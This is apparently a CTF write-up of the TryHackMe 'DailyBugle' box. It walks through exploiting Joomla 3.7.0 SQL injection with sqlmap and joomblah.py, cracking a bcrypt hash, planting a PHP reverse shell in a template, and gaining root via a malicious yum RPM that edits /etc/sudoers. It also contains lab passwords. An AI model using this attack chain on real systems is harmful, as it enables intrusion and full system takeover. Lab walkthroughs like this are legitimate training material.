DailyBugle is a CTF Linux box with difficulty rated as “high” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and privilege escalation using yum.
Network Scanning
nmap -sC -Pn -T4 10.10.10.230 -oN nmap_result.txt
Enumeration
We have identified a robots.txt file containing an administrator directory.
Upon opening this directory we found out that an instance of Joomla was running on this website.
Joomla is a free and open-source content management system (CMS) that is used to build websites and online applications. Now we have to scan the Joomla with the help of joomscan to find the version and other pieces of information.
joomscan -u http://10.10.10.230
Right away we looked out for public exploits for this installed instance using searchsploit and discovered that version 3.7.0 was vulnerable to SQLi via the com_fields parameter.
searchsploit joomla 3.7.0
searchsploit -m 42033
Exploitation
As exploit number 42033 told us, this sql injection vulnerability could be exploited by the following command
sqlmap -u "http://10.10.10.230/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
However, while running this scan, it was taking way too long and so, we looked out for another script called “Joomblah.py” which is a POC for this SQLi vulnerability in Joomla v3.7.0. So we downloaded this script, ran and found credentials!
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
python2.7 joomblah.py http://10.10.10.230
Now we have to identify the hash type. So we use hashid to identify the hash and after analysing the hash through hashid we are sure that it is bcrypt hash.
Thus we saved this hash in a file and Now we have to crack the hash with the help of john the ripper tool and the cracked password we obtain is spiderman123
echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
john --format=bcrypt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
We see we have received clear text credentials. We logged in to the admin panel using this and can see a dashboard now!
Like with any other CMS, Joomla also has templates that are running on PHP, therefore, right away we copied the php-reverse-shell.php code in the template file and clicked on template preview. Before launching template preview we also set up a netcat listener
nc -lnvp 4444
On our listener we see a shell popped up!
Privilege Escalation
Now that we have a working TTY on the victim box, we started looking for ways to escalate privileges. We checked the sudoers file but nothing was found.
After a quick system check and looking at the website’s files, we found a configuration file that had credentials of a database. root user had the password: nv5uz9r3ZEDzVjNu
cd /var/www/html
cat configuration.php
Now, we tried to login into another existing user jjameson using this password and it worked! We immediately spawned a stable teletype using python. Thereafter, we looked into the sudoers file and found yum in the entries.
su jjameson
nv5uz9r3ZEDzVjNu
sudo -l
Referring to gtfobins post here we can escalate our privileges by creating our custom RPM executable. For this we need rpm, fpm to be installed first. Thereafter, we’ll copy a command into a shell script. This echo command simply adds my user jjameson into the sudoers file so that any command can be run as root. This would be our payload. Then we create an rpm package using fpm package.
apt install rpm
gem install fpm
echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh
fpm -n root -s dir -t rpm -a all --before-install my.sh .
python3 -m http.server 80
Now all that’s left to do was to copy this file into /tmp directory on the victim’s box.
cd /tmp
wget http://10.17.11.201/root-1.0-1.noarch.rpmSo, we downloaded it and ran using yum localinstall command. It ran successfully! We ran bash shell as sudo and as expected jjameson (my user) ran it as root and thus privileges were escalated! Finally, we read the congratulatory flag!
sudo yum localinstall -y root-1.0-1.noarch.rpm
sudo bash
cd /root
cat root.txt
